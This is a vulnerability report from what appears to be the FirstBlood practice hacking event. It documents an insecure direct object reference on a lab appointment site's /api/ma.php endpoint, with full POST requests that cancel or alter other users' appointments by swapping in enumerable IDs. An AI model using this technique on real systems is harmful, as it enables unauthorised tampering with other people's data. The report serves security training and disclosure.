FirstBlood-#76Cancel arbitrary reports through 'aptid' parameter



On 2021-05-09, ibruteforce Level 4 reported:

Usually, when you book for an appointment at http://firstbloodhackers.com:49234/book-appointment.html and when you're looking to cancel using your appointment at http://firstbloodhackers.com:49234/yourappointments.php, a request is made which is shown below.

As you can see, instead of id parameter, you can actually pass aptid parameter which is used in doctor's panel.

On doctor's panel, http://firstbloodhackers.com:49234/drpanel/index.php, in the dashboard, if you click for appointments dashboard, we can see that it makes a request as follows

Copy the aptid parameter with the value (56919165 in this case) and paste it in the POST request when you're cancelling the appointment. Your post request should now look like this.

POST /api/ma.php HTTP/1.1
Host: firstbloodhackers.com:49234
User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SCH-I535 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Prefer: safe
Content-Type: application/x-www-form-urlencoded
X-SITE-REQ: permitted
csrf: 99215d4e-0ff3-4275
Content-Length: 50
Origin: http://firstbloodhackers.com:49234
DNT: 1
Connection: close
Referer: http://firstbloodhackers.com:49234/manageappointment.php?success&aptid=d67e9093-ab7e-457d-a836-272d11a2d984

act=cancel&aptid=56919165

You should now get a success message indicating that it has now successfully been cancelled.

To move to the next appointment, all you've to do is increment 56919165 by 600 which is56919765.

Edit: After further investigation, it was noted even though the response gave success, it wasn't actually cancelling the reports, However, I've found that you can still change the message or manage the appointment on the /api/ma.php endpoint.

So now, your request should look like which shows that you change the message of the appointment using an ID.

POST /api/ma.php HTTP/1.1
Host: firstbloodhackers.com:49387
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Prefer: safe
Content-Type: application/x-www-form-urlencoded
X-SITE-REQ: permitted
csrf: 99215d4e-0ff3-4275
Content-Length: 39
Origin: http://firstbloodhackers.com:49387
DNT: 1
Connection: close
Referer: http://firstbloodhackers.com:49387/manageappointment.php?success&aptid=ebe93362-cd25-4f71-8135-4c944c73ba46

message=testzzzz&id=56910219

To move to the next appointment, all you've to do is increment 56919165 by 600 which is56919765.

P2 High

Endpoint: /api/ma.php

Parameter: aptid

Payload: NA


FirstBlood ID: 6
Vulnerability Type: Insecure direct object reference

The endpoint MA.php (to modify an appointment) will allow for integer values to be used when modifying appointments. A bad cause of security through obscurity was attempted.


Respect Earnt: 1.5M
RESPECT ($RSP) is an experimental cryptocurrency based on the Ethereum blockchain with the mission to show respect to those who deserve it. We are testing it out on our FirstBlood hackevent.